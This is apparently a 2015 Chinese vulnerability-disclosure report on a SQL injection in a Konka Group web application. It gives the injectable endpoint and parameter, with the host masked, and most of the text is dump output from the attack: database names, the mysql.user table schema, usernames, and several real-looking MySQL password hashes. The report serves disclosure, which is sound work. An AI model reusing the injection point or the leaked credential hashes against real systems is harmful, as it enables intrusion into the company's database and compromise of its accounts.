2015-09-03: 细节已通知厂商并且等待厂商处理中 2015-09-06: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-16: 细节向核心白帽子及相关领域专家公开 2015-09-26: 细节向普通白帽子公开 2015-10-06: 细节向实习白帽子公开 2015-10-21: 细节向公众公开
康佳集团SQL注射(疑似爆出管理信息)
注射点:http://**.**.**.**/tv?code=stdtbyds
简单明了的数据库
脱点数据下来
available databases [5]:[*] information_schema[*] konka_cms[*] mysql[*] performance_schema[*] testDatabase: mysql[24 tables]+---------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------+Database: mysqlTable: user[42 columns]+------------------------+-----------------------------------+| Column | Type |+------------------------+-----------------------------------+| User | char(16) || Alter_priv | enum('N','Y') || Alter_routine_priv | enum('N','Y') || authentication_string | text || Create_priv | enum('N','Y') || Create_routine_priv | enum('N','Y') || Create_tablespace_priv | enum('N','Y') || Create_tmp_table_priv | enum('N','Y') || Create_user_priv | enum('N','Y') || Create_view_priv | enum('N','Y') || Delete_priv | enum('N','Y') || Drop_priv | enum('N','Y') || Event_priv | enum('N','Y') || Execute_priv | enum('N','Y') || File_priv | enum('N','Y') || Grant_priv | enum('N','Y') || Host | char(60) || Index_priv | enum('N','Y') || Insert_priv | enum('N','Y') || Lock_tables_priv | enum('N','Y') || max_connections | int(11) unsigned || max_questions | int(11) unsigned || max_updates | int(11) unsigned || max_user_connections | int(11) unsigned || Password | char(41) || plugin | char(64) || Process_priv | enum('N','Y') || References_priv | enum('N','Y') || Reload_priv | enum('N','Y') || Repl_client_priv | enum('N','Y') || Repl_slave_priv | enum('N','Y') || Select_priv | enum('N','Y') || Show_db_priv | enum('N','Y') || Show_view_priv | enum('N','Y') || Shutdown_priv | enum('N','Y') || ssl_cipher | blob || ssl_type | enum('','ANY','X509','SPECIFIED') || Super_priv | enum('N','Y') || Trigger_priv | enum('N','Y') || Update_priv | enum('N','Y') || x509_issuer | blob || x509_subject | blob |+------------------------+-----------------------------------+Database: mysqlTable: user[10 entries]+--------+| User |+--------+| konka || root || root || root || root || root || root || root |||+--------+*827BC6E1FD714C1063D936EC2C795A4207E4D793*FB8258CF5A936B85AABB73531959063D8BDD9757*FB8258CF5A936B85AABB73531959063D8BDD9757*FB8258CF5A936B85AABB73531959063D8BDD9757*FB8258CF5A936B85AABB73531959063D8BDD9757
密码也不知道什么鸟加密方式。。。。。无语了
综上
你们懂
危害等级:中
漏洞Rank:10
确认时间:2015-09-06 09:14
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无